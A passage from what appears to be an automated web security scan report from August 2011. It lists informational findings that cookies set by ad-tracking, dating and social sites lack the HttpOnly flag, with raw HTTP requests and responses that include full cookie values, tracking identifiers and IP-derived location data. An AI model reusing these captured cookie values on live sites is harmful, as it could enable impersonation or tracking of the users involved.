rsi_us_1000000="pUP1Jk+j/xMUlj0GV1on/PIeTeZhl/ABIuE0WATIveE06i3f0/xPmLL3uOLZaEB2f2gDfDhI1d91v5puz+N+6b+yvAo7GmaZkTq4Gm/Rw7Ljd/ZFVxiCmfHFFWQyHdzyHv/gxecfTf0/SyR1+0VhDtz2BGcpw7DrM9CfG7dEUG+QQy48Tjo3f24UO/go/049JUZhb76OoyXf/6SsReISLRGVWABNu40UtI3M+cn6gvH8m7abUkKgNwpchhscue2RqqNDoORNIyedxSKdO2NOlKUAinGJIoTupBNQ+Mx5DmeNaeEo0C/I4Kv4rHf7JrR6RNw/NPeBTYR2xzi9Zvc3zfc6z0pTOxpRBzYH4LVtkyF693p6F/duCOSgZkFoF/znm+3H1Y20oOPl3hujZdVgHeaHqj58hOdBb05PleRPZZ36jDJIVm36L6xNl1FI8WeVpkg/gaI9e6dNRG23dHY8U9IY5mfsM8xmgluUCGMJJGcMdbbvccHZIfQ7W1mES+WSeFi1NtIJhqhmsTUdSkpZWOQmgOr7GWaFoTimBcYT5OO3XglWxJ1SFjhurKeAG4O/TiN3yIsta/QyhrTL8HSpL0VaSCXDxRpybSjGaR1Kz7ZbEVRh8qCZtEprm9HQ4/pHm1U35k48q7YXQzhc4Jz4pOrCG7otKe7T9nVU5WPO3R4fXKMJaywU"; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqolNtLYIVF5M27L8vfsI7WByyXJ6gBlNTNwT8g7lTtVTtlUQIhMYnhGBxqxPi16ATScNUThNteKFr5insIjhhJfnz5/4MOhd/n6wiinE7/s0pX+4B2zcJ7hc=; rtc_GS70=MLuBa44HgVlDFVRDdcKRB3R3EIDZKgaJBK6woh4rAtJmVgX80yTcxtVUvX+wZdfT3z9ZvCMjShpnZzliZicNbn0rTj3r40ki4zC8bshHCjemRQboH1Al2GjhyihsVmLmviEIBiwmfPx4G76pEjpFI99ARJ8f4YFvwAdZJA==; NETSEGS_A09801=0a29f867077d7a4f&A09801&0&4e6e5333&0&&4e489fec&eb0686832faccc361b6bf55e98e31ad5; udm_0=MLv3MlMJbipn3hddo59fs/SyNUtp5oKbu+uMI45hFi1crut9DVZMSamSoBVFCRxGD5SIkS4D7WfwauVpCTw0Isk0omPT0Tbv5GMpHBVB5rNOJAP4+C/tdjadkIbYlgmXsvl6af2CYfyHx2Fc+fRI8l8hGsZQqzcAo9lQzfSm2W7ZzyQXi8WYBorNSmxkYhQQXoywAu4JjybHNxA3t69iOVyMFgoFtx1G/VLYBy2ckaOoIQANfyMKcxP+UxT3Jn7P4wgAXpu0VTPkD4N5Z7K5WidIL2L5CilY1JqslKzE1ji3W1NeFMNO9ouAijnMUhpLIVh5wexNmEO3xoxjurbe12d4EQTAQ1G4O83w0kkywHJkZ1lvDa2U/gabuvnh/a86fltTRfLC3hgQT1+ehya+ibS7NOm3Y5T9p8T7r/AVRBZmMv3ogwezAVJC8s917JE07Dl8h/jQa7j7YBBTA93WrD9BJxYWTizsonoEB5WYcFmoBk/QId91CBBXcNILKxWwqSlhyjf5AErwWPLcfEAzsTQHJhcE872Jv+ZsdTpn1XyyT4bxukBDSZGRGTw0JMZSAkdPpjsRpybMNOwZ45B6dz5MC8RRJC3Kw1+MYuyweXCNUfFJ+VnaC6FHXV8riDUULFwCNAkI0TBq/shPPICat0erHDyNmoHVEonAj7l/5KN2SAKTcTMj7DDCojn89lrgiziLJdzwDCQjximaGJ+Nnxrcl/1E44fQiTP3paeTq07w6gsCZ92FCh2OqI1FXjN+gGqWy96fehBxvVzyr2BCrWzzA8v/EaON+tZSngXUhs+gYtzqUC+NV5qgUMV79w2XXRs69BtEX8wQY2e5/7+uuwt/geJdkgLt+QIOeRPgN7x9GitTgNaD6po3S0xQCItbkSjDvL37sQk3aKzGbbygzKFbzZytJy71bToQRbkka+9nlHboploKpgM3NJ7Rxi+REO75GUPPOPr+TDJsqqT8vnWgeONaddsTuhm0tX3zgEmMZ6FK+6c=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_GS70=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_wwje=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_KRSP=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPNJ0OBbwIMV594t637GLQSUx0QQshaUYKRlElRhEc6MjPMnNZz8nFpJPW5vrupC8lCsyJmYKBhPjVRNZcigIhmqy9caPE6KAjj9+yavk/KdbJkwe/qD/Or8kPC8FIYBTx0nA0T0fc9VX1q8Mrew2PJ75Byor6dSWR9iScAMmhoNLQF6IW55JZH7Ha61eSkxX9ZGyBQDuYSF/RXWSPaxDAKJ+RpsARZZmmUlSmxPZAe/ucTRouK8HscBc0djY/73JKd3//mIFs8+rXlY3hqotZAQFItxLP6hw==; Domain=.revsci.net; Expires=Tue, 14-Aug-2012 18:45:53 GMT; Path=/
Set-Cookie: NETSEGS_K05540=0a29f867077d7a4f&K05540&0&4e6e5361&0&&4e488ee9&eb0686832faccc361b6bf55e98e31ad5; Domain=.revsci.net; Expires=Mon, 12-Sep-2011 18:45:53 GMT; Path=/
Set-Cookie: rtc_LKl6=MLsvsVMucS5jJgGEqf0+SSboi2Cf8C1vfG5Yj1wkQJlJCzBkDjdLIVHHUYDkVpOt9vI5TWNHFkzcJPsrJWZ2qOMv39nU7OucskGTXdLE59ONvvowQQXiiV1fDsHj5Fpr55See62gOSdX3JM4LRi3mVhwfdiGTWdzvGrhzKJOXYkvZHlpvba083PdzfZ+5myzKSgTOBHmeHp0TJUhcoczD2fuAvqTLxGntKbJYV6671YbsoEW/gQdTgahzNCIYU3LKx950sEl9JlU4DLN/Ye673ZdIt7H7aJumAIJakbFVhWIkFw4f2CYn9LVs7UE9Zf1C1WFsUyUb9v0ePciulBEFa+Owqho/EPO+ZCqXtQ6jDmVZBxuzqhm9k0/+9kHvcZo9RJQaZ+ZcNxz9m6RbhR6Usv7; Domain=.revsci.net; Expires=Tue, 14-Aug-2012 18:45:53 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:45:53 GMT
Content-Length: 1580

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs=['H07710_10052','H07710_10515','H07710_10541','H07710_10343','H07710_10458','D08734_72639','H07710_50001','H07710_50002','H07710_50006',
...[SNIP]...

8.48. http://pix04.revsci.net/H07710/b3/0/3/1008211/886893878.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07710/b3/0/3/1008211/886893878.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07710/b3/0/3/1008211/886893878.js?D=DM_LOC%3Dhttp%253A%252F%252Ftech.fortune.cnn.com%252F2011%252F08%252F15%252Fis-google-buying-motorola-for-its-17000-patents%252F%253Fiid%253DEL%2526_rsiL%253D0%26DM_CAT%3DCNNMoney%2520%253E%2520technology%2520%253E%2520fortune%2520tech%2520blogs%26DM_REF%3Dhttp%253A%252F%252Fmoney.cnn.com%252F2011%252F08%252F15%252Ftechnology%252Fgoogle_motorola%252Findex.htm%253Fhpt%253Dhp_t2%26DM_EOM%3D1&C=H07710 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=4bf7bb16cf9412c18b8815136d91a59c; rsiPus_Mq_O="MLtPrM93sF9/IDFKT1Ygcyo+R7jFHbJwml9GW5geBHPr+wUITnpse6B5lWFJNAXVCUA2z+7FWZhAQVd6dFXIMjlKZdfb+YKvHMG9lK6M/tj+sUrbdzOSXNiidYeVFSXJGWrqvB4arfK8FH2r+PQoSgVZUPXYsJ2/PWutIm37r0LU6nMnOm2SQDpMvF3l"; rsi_us_1000000="pUP1Jk+j/xMUlj0GV1on/PIeTeZhl/ABIuE0WATIveE06i3f0/xPmLL3uOLZaEB2f2gDfDhI1d91v5puz+N+6b+yvAo7GmaZkTq4Gm/Rw7Ljd/ZFVxiCmfHFFWQyHdzyHv/gxecfTf0/SyR1+0VhDtz2BGcpw7DrM9CfG7dEUG+QQy48Tjo3f24UO/go/049JUZhb76OoyXf/6SsReISLRGVWABNu40UtI3M+cn6gvH8m7abUkKgNwpchhscue2RqqNDoORNIyedxSKdO2NOlKUAinGJIoTupBNQ+Mx5DmeNaeEo0C/I4Kv4rHf7JrR6RNw/NPeBTYR2xzi9Zvc3zfc6z0pTOxpRBzYH4LVtkyF693p6F/duCOSgZkFoF/znm+3H1Y20oOPl3hujZdVgHeaHqj58hOdBb05PleRPZZ36jDJIVm36L6xNl1FI8WeVpkg/gaI9e6dNRG23dHY8U9IY5mfsM8xmgluUCGMJJGcMdbbvccHZIfQ7W1mES+WSeFi1NtIJhqhmsTUdSkpZWOQmgOr7GWaFoTimBcYT5OO3XglWxJ1SFjhurKeAG4O/TiN3yIsta/QyhrTL8HSpL0VaSCXDxRpybSjGaR1Kz7ZbEVRh8qCZtEprm9HQ4/pHm1U35k48q7YXQzhc4Jz4pOrCG7otKe7T9nVU5WPO3R4fXKMJaywU"; NETSEGS_A09801=0a29f867077d7a4f&A09801&0&4e6e5333&0&&4e489fec&eb0686832faccc361b6bf55e98e31ad5; NETSEGS_H07710=0a29f867077d7a4f&H07710&0&4e6e5361&0&&4e488f9e&eb0686832faccc361b6bf55e98e31ad5; NETSEGS_K05540=0a29f867077d7a4f&K05540&0&4e6e5383&0&&4e488ee9&eb0686832faccc361b6bf55e98e31ad5; rtc_w54y=MLsvsVUucS5nJQFEi0OFSQGsjmcetiRaMit+bPGA4R6sZTDkRNAty6Ok5Rbj1A1ioyFEyOvtSDQ/TCNhLSQnMfFltc+1RgLHG60dAReBwur1y8NK9KN/Dcuri2m9TX0WX88UsNrZZUFvhX4gjJPA/IvQAfEyV42LBl1ycziW9oQCPM4wqBsyekr/QAwGJROYDG+0Ga8kxeAZhwipX7/SncE360pVtpvbYb286UDOyKadu9yX5vU5Qs3ZjPvH+kL8j3SfOR53vGwJNDve0naNljcfd9Bk2VzdOh+hbxPQOvocOVQO1E5oD6q+Ae+ZBJDf0rUe4vJF/hy/3qulgTgqvUqi4ANcoG/n4Wm30r3OcEpBzrZH98YC/BAiRwMdtNrapTzKSrNM3VjnPMf/vX2R/pvLCrsbixfPFoZzugmUnA==; rsi_segs_1000000=pUPNJ0OBbwIMV594t637ir85ZKw1UP1rwrKnF0RvvMpZKm8INDTToS2ouxUK6vhhP1CiHsUkC/S+LA0hUkfrTqDh02Adt9O/bxh+p4BRGIFoV5KPobve5AmF69qHl/p4Y6qkzvL/4/cH3yDSxc+IZrQuBcqFKNblvXNAngJPodmU1PMQNiadyR/shRZmjapdy9mKaOfP9eLQncoMS1JJRzzo2e/fuxejfinXLu4/xBJ1owyDCGngQ7C1ONlfjtvlWP+2zKPcenlg0O40YbxNuwTHm3FVQw==; udm_0=MLv39VEJbipn5t7J7tE47oWpHVhV4iFqyoWhb2YXc6RRizmzpbqRcFBJpZa8l0/uGxQLxorDLBD8TuVA5WUNID4jhibwZ4E3KEU7bmjAF+DMTX99Z8e5TAcE/5iospv1jq9WzdzH5G3PkTAHlmVVPjMTmkYoiypja8RHeBfW2LL9lawOWNi8GwZWyw2dptMkZkc87MWtUzoO+rbDn+knVc2nLJWzG1vDLEyevLiplpqbjrKec46MMWKWbmMzN6p9Rw0yaI/TkoS+QszoihnKYnTOv4liHmcyUNB3uDcCjJB89p4BkAaVcvlMvwsKDN2hy/x6WccZasvQrozCULup8a8RXgtxrWqM/VBtvHre1tNbfO3uTCLNnN+OpRrzm57EzcIQtJXTltma6dUA+8ydgf8unZm1D8/nsjrnkKFE/a/QeFcsbB/QzplghtgVlbWO9Veu6ri/Bl1yDicT1Kx85i9E8fFUNK1ps6ulCkx9MzRALJPTCYsaXNd+smUyAgPXJoxUtWuoMfjw/WyJB87mUUKGn5DfwJSI/GPXnJ9pX8UJdPSlij4d47Z1GkF4/TLjx0B09V9bIFsdq1cISdi1EeAUfKzuTAARPEHqqFm0tAwzQYOwol+JFGsyGw8mWij3NSBIoWsTuyOw90Q/RODiirBkJZC5+xVSm/1OF4AEL77IF2UQam7poywBCRgs1KI/BO4b86ksCDD+9xxr4vHsm36fCJ0Zm7hnJHavzcI3BlVT5mFi8Pyrs/sAV7+YncekvRHOkcYlTf/bxdaqbNUSRNIvL+wESWlSU6Aivg+oq+GzA7lWv2MOfB60fwu3JaGiGVlNEW/hUozI25/78jDSNd6GhJcXulA9rfV2Bm2jvmVm2v8JIfW1jtNqJ70byKHRd5Dp+EHW1b7BMtwMK8g38PlNfoKZ6rOwz4jKQuNu7dBIs4xwZq/rTrJZq1QFru72+1vyngso51QCD7ofa22bBk6bIzGnZHqw7LKckKR0Px2GDzHiqKZKGOrsMXwRIoT1IuLLN8mska8o+hzro3rcfjPZQPShQdRUyys5bIh66cb9OtaO6QfQLMHigl9kIwrCGA==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_w54y=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_wwje=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_GS70=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_KRSP=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_sPwj=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJkOBbwIMV594t6370FESecNWU/1rwrKnF0RvvMpZKic5ngyRcQgYrs0bIzTjXSAIcE4zTaFgPgtwc8lVQPi/gyxKsYP+vNRmenbJ6esMOTfuQPPWuRacBYCoCRTRO57PdHBMVyIWESlQnpxz0YF0eyDxIX93DUG/JW4VG2H/Fq9uz5dAOPMtPl+iqnAOUmltwt9hgm8W4eB0jIA/gkmJyi9baCyBm6zX3y0gha7M+pXBFYNHNJETkkeNoZnWqwtK9k/mSji+wt97fjci1sUfRNO7I+EXKSY4EuEXliBFR5Bi1eTlWXMKjqRtmw==; Domain=.revsci.net; Expires=Tue, 14-Aug-2012 18:49:25 GMT; Path=/
Set-Cookie: rtc_3b9U=MLs3sVMu8D5nJxHcWw+0zMKkj2Ec8AtgOr6luGR0s/YGr/xIEyuuo6PyP6rJ0huw9fXd6eF11jsqafZ5D+xsAtuozm3Y+FP7gO7bzYbJ3BQaYAbxIXeqtI6gDqEbJDEUZ+OaHlsnUySUjfOYD5RN2whRNsKtuTXJSoXImp9Bjn0ejWdnK8a6//EQI/8+dPnXpiVbJ/jGiMc8aaXYHrTot0RryuQ3ppNos7U2ucvQ2S09+GQFPnIzJ/nDdOnUEBp6IR5hscrpvn6gbQJdnHaOZVmXUNHaMqju0cicQuy33ukQ+idHdRM2s+iGUUSCL7fb4c98Ybo5nH4y1IcRphkaUYgwOxVaAYZMBcKLEfAUJEEIIwJynHkS3xqpLNBouYZqgiAjOeG8tfsDuS5VbvJMlvSyZgnoPaG3RVr3E0bSMZbjG79N2WoTaddr; Domain=.revsci.net; Expires=Tue, 14-Aug-2012 18:49:25 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:49:24 GMT
Content-Length: 1790

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs=['H07710_10055','H07710_10041','H07710_10194','H07710_10052','H07710_10138','H07710_10515','H07710_10541','H07710_10313','H07710_10343',
...[SNIP]...

8.49. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=2358 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/display.html?cl=ca-aj-cat&ch=&ty=image%2Cflash&size=300x250&kw=&hints=&target=/5480.iac.usa.ask.hp.x.x.dir/;sz=300x250;log=0;s=as;hhi=159;test=0;ord=1313432642380?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2146=epx833ob7ioshhooj9oxwp9jj6h1a7p1; put_1430=7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0; put_1185=3041410246858069995; cd=false; au=GR8BFBR6-BJ4A-10.195.158.129; lm="11 Aug 2011 22:44:28 GMT"; put_1994=1sbvs30c072oq; put_2054=be7b476b-57fa-4267-a79e-a26d510d1377; rpb=7249%3D1%264554%3D1%264212%3D1%262373%3D1%264940%3D1%265327%3D1%265421%3D1%267203%3D1; rpx=7249%3D13566%2C0%2C1%2C%2C%264554%3D13884%2C0%2C1%2C%2C%264940%3D14009%2C120%2C2%2C%2C%264212%3D14028%2C0%2C1%2C%2C%262373%3D14129%2C0%2C1%2C%2C%265327%3D14148%2C0%2C1%2C%2C%265421%3D14172%2C0%2C1%2C%2C%267203%3D14173%2C0%2C1%2C%2C

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:24:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7249%3D1%264554%3D1%264212%3D1%262373%3D1%264940%3D1%265327%3D1%265421%3D1%267203%3D1%262358%3D1; expires=Wed, 14-Sep-2011 18:24:14 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7249%3D13566%2C0%2C1%2C%2C%264554%3D13884%2C0%2C1%2C%2C%264940%3D14009%2C120%2C2%2C%2C%264212%3D14028%2C0%2C1%2C%2C%262373%3D14129%2C0%2C1%2C%2C%265327%3D14148%2C0%2C1%2C%2C%265421%3D14172%2C0%2C1%2C%2C%267203%3D14173%2C0%2C1%2C%2C%262358%3D14194%2C0%2C2%2C%2C; expires=Wed, 14-Sep-2011 18:24:14 GMT; path=/; domain=.pixel.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

8.50. http://pop6.com/p/memsearch.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pop6.com
Path:   /p/memsearch.cgi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /p/memsearch.cgi HTTP/1.1
Host: pop6.com
Proxy-Connection: keep-alive
Referer: http://pop6.com/
Content-Length: 281
Cache-Control: max-age=0
Origin: http://pop6.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ff_who=r,5w65lMjrqLrwOMX4tBJDb3u9zVyXXDfb8iqcLCgxMtTLydmHHDS2BQhVEFNyJfQm4GGOFc5Xe_Ay7fmuhWNXhiJ_qPyy_w/CzZc1DYiFS5o5eIrIEI51W9T/zDmtNu/o; v_hash=_english_0; IP_COUNTRY=United States; ff_tr=r,E7RSUL0YFx2gJ7Q5eed7yd8wG821Dq4Jd7gqlIWv6YPoJFKcFXi8XGVOPB7IKuq0; LOCATION_FROM_IP=ip_type&Mapped&connection&tx&country_code&US&lat&37.33053&asn&36351&state&California&ip_routing_type&fixed&carrier&softlayer+technologies+inc.&city&San+Jose&postal_code&95122&country_code_cf&99&state_cf&95&latitude&37.33053&second_level_domain&softlayer&country&United+States&longitude&-121.83823&country_name&United+States&area_code&408&timezone&-8.0&line_speed&high&aol&0&top_level_domain&com&region&southwest&city_cf&80&pmsa&7400&zip&95122&msa&41940&continent&north+america&lon&-121.83823&dma_code&807; HISTORY=20110815-1-Dc; REFERRAL_URL=; click_id_time=1867065876_2011-08-15 11:57:42; ki_u=e0c8bfdc-f008-5f82-d3b9-1cc1d298f090; ki_t=1313434723803%3B1313434723803%3B1313434723803%3B1%3B1

who=r%2C5w65lMjrqLrwOMX4tBJDb3u9zVyXXDfb8iqcLCgxMtTLydmHHDS2BQhVEFNyJfQm4GGOFc5Xe_Ay7fmuhWNXhiJ_qPyy_w%2FCzZc1DYiFS5o5eIrIEI51W9T%2FzDmtNu%2Fo&site=ff&searchtype=photo_search&looking_for_person=1&find
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:05:35 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: ff_who=r,9tCSyhGmD_RyWOBWStVf6Xu9zVyXXDfb8iqcLCgxMtTLydmHHDS2BQhVEFNyJfQm4GGOFc5Xe_Ay7fmuhWNXhiJ_qPyy_w/CzZc1DYiFS5o5eIrIEI51W9T/zDmtNu/o; path=/; domain=.pop6.com
Set-Cookie: v_hash=_english_0; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:05:35 GMT
Set-Cookie: IP_COUNTRY=United States; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:05:35 GMT
Set-Cookie: ff_tr=r,E7RSUL0YFx2gJ7Q5eed7yd8wG821Dq4Jd7gqlIWv6YPoJFKcFXi8XGVOPB7IKuq0; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:05:35 GMT
Set-Cookie: LOCATION_FROM_IP=connection&tx&ip_type&Mapped&lat&37.33053&country_code&US&asn&36351&state&California&carrier&softlayer+technologies+inc.&ip_routing_type&fixed&city&San+Jose&state_cf&95&country_code_cf&99&postal_code&95122&latitude&37.33053&second_level_domain&softlayer&country&United+States&area_code&408&country_name&United+States&longitude&-121.83823&line_speed&high&timezone&-8.0&aol&0&region&southwest&top_level_domain&com&city_cf&80&pmsa&7400&msa&41940&zip&95122&continent&north+america&lon&-121.83823&dma_code&807; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:05:35 GMT
Set-Cookie: HISTORY=20110815-3-Dcs1; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:05:35 GMT
ETag: TESTBED
P3P: CP="DSP LAW"
X-ApacheServer: ii70-15.friendfinderinc.com
Vary: Accept-Encoding
Content-Length: 75888
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="canonical" href
...[SNIP]...

8.51. http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pt-br.facebook.com
Path:   /people/Andr%C3%A9-Azevedo/1668500662

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /people/Andr%C3%A9-Azevedo/1668500662 HTTP/1.1
Host: pt-br.facebook.com
Proxy-Connection: keep-alive
Referer: http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662
Content-Length: 998
Cache-Control: max-age=0
Origin: http://pt-br.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.206519616063696.51681.146642365384755; act=1313433616787%2F1

post_form_id=208956c150919ab1cdeb13e59d929c7b&lsd=yxUAz&captcha_persist_data=AZn2Prk2YE02IBt6SralDuwZdXf9ZmW3h45Cn_PY4olwLPKhUXsCTDVn8L9HD-Vh3HuEMIvMMVmehaCRNynGK33nkkHNi9pP41mupKoNjo04_5AY6G12AqHHbwP
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: rdir=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fpt-br.facebook.com%2Fpeople%2FAndr%25C3%25A9-Azevedo%2F1668500662; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: x-src=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.166.91
X-Cnection: close
Date: Mon, 15 Aug 2011 18:39:57 GMT
Content-Length: 72641

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt" xmlns:og="http://ogp.me/ns#" lang="pt" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;wi
...[SNIP]...

8.52. http://r1-ads.ace.advertising.com/site=789981/size=728090/u=2/bnum=73612408/hr=13/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.imdb.com%252Fimages%252FSF99c7f777fc74f1d954417f99b985a4af%252Fa%252Fifb%252Fdoubleclick%252Fexpand.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=789981/size=728090/u=2/bnum=73612408/hr=13/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.imdb.com%252Fimages%252FSF99c7f777fc74f1d954417f99b985a4af%252Fa%252Fifb%252Fdoubleclick%252Fexpand.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

